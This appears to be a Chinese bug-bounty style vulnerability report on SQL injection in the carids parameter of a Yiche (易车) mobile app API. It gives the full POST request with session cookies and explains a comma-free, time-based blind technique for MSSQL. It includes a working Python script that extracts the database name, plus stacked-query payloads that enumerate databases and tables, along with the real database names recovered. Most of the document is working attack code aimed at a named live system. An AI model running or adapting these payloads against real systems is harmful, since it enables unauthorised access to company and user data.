目标:易车网官网APP 检测发现以下地方存在注入:(POST中的carids,stacked queries)
POST http://api.ycapp.yiche.com/Car/GetCarStylePropertys HTTP/1.1 Host: api.ycapp.yiche.com Cookie: __cs_visitor=1445701271467275; __v3_cs_skey_10027=4hmi4s; a=Rw0qZ0AXX3h5; tsc=3_562ba697_562ba697_0_1 Accept-Encoding: gzip,deflate X-Requested-With: XMLHttpRequest Content-Length: 109 Content-Type: application/x-www-form-urlencoded Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 carids=114069,114070,114071,114018,114065,114067,114064,114066,114068,102164,102159,102163,102155,102148,102147,102152
SQLMap证据截图:
看了下网站被没设什么过滤或者WAF,但是SQLMAP并没跑出库名来; 一、暴数据方法 后来研究了下发现,由于这个参数中的本来就存在逗号,所以逗号会被程序脚本作为分隔符处理掉,这样就传不到数据库了,所以相当于逗号就被过滤了,也就是说注入语句中不能存在逗号。 如果是MySQL数据库的话,直接用substr(user() from 1 for 1)来替代substr(user(),1,1)即可,但是此数据库为MSSQL,只支持substring(user,1,1),必须使用逗号。 后来想了下,使用了字符串比较的方法解决,MSSQL比较字符串是一个个字符往后比ASCII,不管长度如何,只要在前N位分出大小,则停止比较。故按此原理可逐位推算出DB_NAME()等数据。如
; if(db_name()>'Y') waitfor delay '0:0:5'-- -
; if(db_name()>'YI') waitfor delay '0:0:5'-- -
不断枚举最后一位的字符即可~ Python程序如下,以跑11位的当前数据库名为例:(程序中设了个代理,如需使用,请取消)
#!/usr/bin/env python #coding=utf8 import httplib, urllib, re, time count = 0 user_name = '' httpClient = None for i in range(1,15): a = 33 while a < 128: try: params = 'carids=114069;if(db_name()<\''+user_name+chr(a)+'\') waitfor delay \'0:0:5\' -- -' headers = {"Host": "api.ycapp.yiche.com", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0", "Accept-Encoding": "gzip,deflate", "Accept": "*/*", "Cookie": "__cs_visitor=1445701271467275; __v3_cs_skey_10027=4hmi4s; a=Rw0qZ0AXX3h5; tsc=3_562ba697_562ba697_0_1", "Connection": "keep-alive", "X-Requested-With": "XMLHttpRequest", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": len(params)} httpClient = httplib.HTTPConnection("192.168.1.2", 8888, timeout=30) httpClient.request("POST", "http://api.ycapp.yiche.com/Car/GetCarStylePropertys", params, headers) st = time.time() response = httpClient.getresponse() #rp = response.read() if count == 1: if time.time()-st > 5: user_name = user_name + chr(a-1) print "db_name: "+user_name count = 0 break else: count = 0 else: if time.time()-st > 5: count = 1 a = a - 1 a = a+1 except Exception, e: print e finally: if httpClient: httpClient.close()
二、数据证明 1)当前数据库:YICHEMOBILE
;if(db_name='XXX') waitfor delay '0:0:3' -- -
(XXX按一中原理遍历)
2)所有数据库个数,共25个
carids=114069;if((select count(*) from master.dbo.sysdatabases)=25) waitfor delay '0:0:3' -- -
3)所有数据库名,这里只列出一些吧,其他的就不跑了
carids=114069;if((select name from master.dbo.sysdatabases where dbid=YYY)='XXX') waitfor delay '0:0:3' -- -
(XXX按一中原理遍历,YYY从1-25,即可遍历25个库名) ================ MASTER TEMPDB MODEL MSDB BITAUTOUSERCRM BITAUTOBI BITAUTOUGCMONITOR YICHEMALLPAYMENT MARKETINVOICE DEALERASSISTANTSYSTEM YICHEMOBILE YICHEMOBILECOMMUNITY YICHEACTIVITY YICHEMEDIA YICHEMOBILESUBSCRIBE MARKETCOUPONS ...... ...... ================
4)我们来看下当前库YICHEMOBILE吧,共930个表
carids=114069;if((select count(*) from yichemobile.dbo.sysobjects)=930) waitfor delay '0:0:5' -- -
5)我们来看两个表名吧,其他的表及具体的数据就深入咯~
carids=114069;if((select top 1 name from yichemobile.dbo.sysdatabases)='XXX') waitfor delay '0:0:3' -- -